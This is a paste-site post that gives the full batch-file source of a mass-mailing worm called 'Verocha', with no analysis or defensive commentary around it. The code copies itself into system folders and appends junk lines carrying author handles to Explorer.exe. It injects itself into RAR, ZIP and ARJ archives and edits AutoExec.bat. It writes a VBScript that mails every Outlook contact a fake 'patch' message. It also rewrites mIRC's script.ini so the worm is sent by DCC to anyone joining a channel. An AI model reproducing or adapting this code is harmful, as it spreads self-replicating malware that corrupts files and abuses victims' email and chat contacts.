
Email-Worm.BAT.Verocha - Source Code

Jun 26th, 2023
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Batch 5.32 KB | Cybersecurity | 0 0
  1. @echo off
  2. if exist c:\Windows\Explorer.exe copy %0 c:\Windows\Exp.bat
  3. cd C:\Windows\
  4. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  5. echo 010110101011101010 BLANK CODE 01001011101010110101010111001 >>Explorer.exe
  6. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  7. echo 01011010101110101011101010101101011 rRlf 010110101010111001 >>Explorer.exe
  8. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  9. echo 010110101011101 ppacket 10101101010101101010110101010111001 >>Explorer.exe
  10. echo 01 Dolomite 10101011101010101101010101101010110101010111001 >>Explorer.exe
  11. echo 010110101011101010111010101011010101011010101 adious 111001 >>Explorer.exe
  12. echo 01011010101110101011101 Energy 1010101101010110101010111001 >>Explorer.exe
  13. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  14. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  15. echo 010110 Writen By Industry 101011101010101101010101101010101 >>Explorer.exe
  16. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  17. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  18. echo 0101101010111010101110101010110101010110 dr.g0nZo 010111001 >>Explorer.exe
  19. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  20. echo 0101101010111010101110 assassin007 101101010110101010111001 >>Explorer.exe
  21. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  22. echo 0101101010111010101110101010110101010 philet0ast3r 10111001 >>Explorer.exe
  23. echo 01011010 El DudErin0 01010101101010101101010110101010111001 >>Explorer.exe
  24. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  25. echo 010110101011101010111010101 Zed 010101101010110101010111001 >>Explorer.exe
  26. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  27. echo 010110101011101010111010101011010101011010 Verchocha 111001 >>Explorer.exe
  28. echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe
  29. echo 010 disk0rdia 101011101010101101010101101010110101010111001 >>Explorer.exe
  30. echo 0101101010111010101110101 Second Part To Hell 0101010111001 >>Explorer.exe
  31. cd ..\Local Settings\Application Data\Microsoft\CD Burning\
  32. copy %0 Setup.bat
  33. cd C:\
  34. if "%1=="#r goto rar
  35. if "%1=="#z goto zip
  36. if "%1=="#a goto arj
  37. for %%r in (*.rar) do call %0 #r %%r
  38. for %%z in (*.zip) do call %0 #z %%z
  39. for %%a in (*.arj) do call %0 #a %%a
  40. goto cont
  41. :rar
  42. attrib -r %2
  43. rar a -tk -y -c- -o+ %2 %0 >nul
  44. goto cont
  45. :zip
  46. attrib -r %2
  47. pkzip %2 %0 >nul
  48. goto cont
  49. :arj
  50. attrib -r %2
  51. arj a %2 %0 >nul
  52. :cont
  53. mkdir _
  54. copy %0 C:\_\_.bat
  55. copy %0 C:\_\
  56. if exist C:\AutoExec.bat goto auto
  57. :auto
  58. echo @echo off >>AutoExec.bat >>AutoExec.bat
  59. echo copy C:\_\ A:\_.bat >>AutoExec.bat
  60. goto mail
  61. :mail
  62. cd C:\_\
  63. echo On Error Resume Next >>mail_.vbs
  64. echo dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad >>mail_.vbs
  65. echo set regedit=CreateObject("WScript.Shell") >>mail_.vbs
  66. echo set out=WScript.CreateObject("Outlook.Application") >>mail_.vbs
  67. echo set mapi=out.GetNameSpace("MAPI") >>mail_.vbs
  68. echo for ctrlists=1 to mapi.AddressLists.Count >>mail_.vbs
  69. echo set a=mapi.AddressLists(ctrlists) >>mail_.vbs
  70. echo x=1 >>mail_.vbs
  71. echo regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) >>mail_.vbs
  72. echo if (regv="") then >>mail_.vbs
  73. echo regv=1 >>mail_.vbs
  74. echo end if >>mail_.vbs
  75. echo if (int(a.AddressEntries.Count)> int(regv)) then >>mail_.vbs
  76. echo for ctrentries=1 to a.AddressEntries.Count >>mail_.vbs
  77. echo malead=a.AddressEntries(x) >>mail_.vbs
  78. echo regad="" >>mail_.vbs
  79. echo regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) >>mail_.vbs
  80. echo if (regad="") then >>mail_.vbs
  81. echo set male=out.CreateItem(0) >>mail_.vbs
  82. echo male.Recipients.Add(malead) >>mail_.vbs
  83. echo male.Subject = "SOLUTION: [TICK] -USA-P3-CaseID 4327120063 - Virus Undetected-IZ61499" >>mail_.vbs
  84. echo male.Body = "The Information & Patch for IZ61499 is attatched." >>mail_.vbs
  85. echo rem male.Attachments.Add("C:\_\_.bat") >>mail_.vbs
  86. echo male.Send >>mail_.vbs
  87. echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" >>mail_.vbs
  88. echo end if >>mail_.vbs
  89. echo x=x+1 >>mail_.vbs
  90. echo next >>mail_.vbs
  91. echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs
  92. echo else >>mail_.vbs
  93. echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs
  94. echo end if >>mail_.vbs
  95. echo next >>mail_.vbs
  96. echo Set out=Nothing >>mail_.vbs
  97. echo Set mapi=Nothing >>mail_.vbs
  99. :irc
  100. cd C:\_\
  101. echo on error resume next >>_.vbs
  102. echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs
  103. echo Set b = fso.CreateTextFile("c:\program files\mirc\script.ini", True) >>_.vbs
  104. echo b.WriteLine "[script]" >>_.vbs
  105. echo b.WriteLine "ON 1:JOIN:#:{" >>_.vbs
  106. echo b.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs
  107. echo b.WriteLine "}" >>_.vbs
  108. echo b.close >>_.vbs
  109. echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs
  110. echo Set a = fso.CreateTextFile("c:\mirc\script.ini", True) >>_.vbs
  111. echo a.WriteLine "[script]" >>_.vbs
  112. echo a.WriteLine "ON 1:JOIN:#:{" >>_.vbs
  113. echo a.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs
  114. echo a.WriteLine "}" >>_.vbs
  115. echo a.close >>_.vbs
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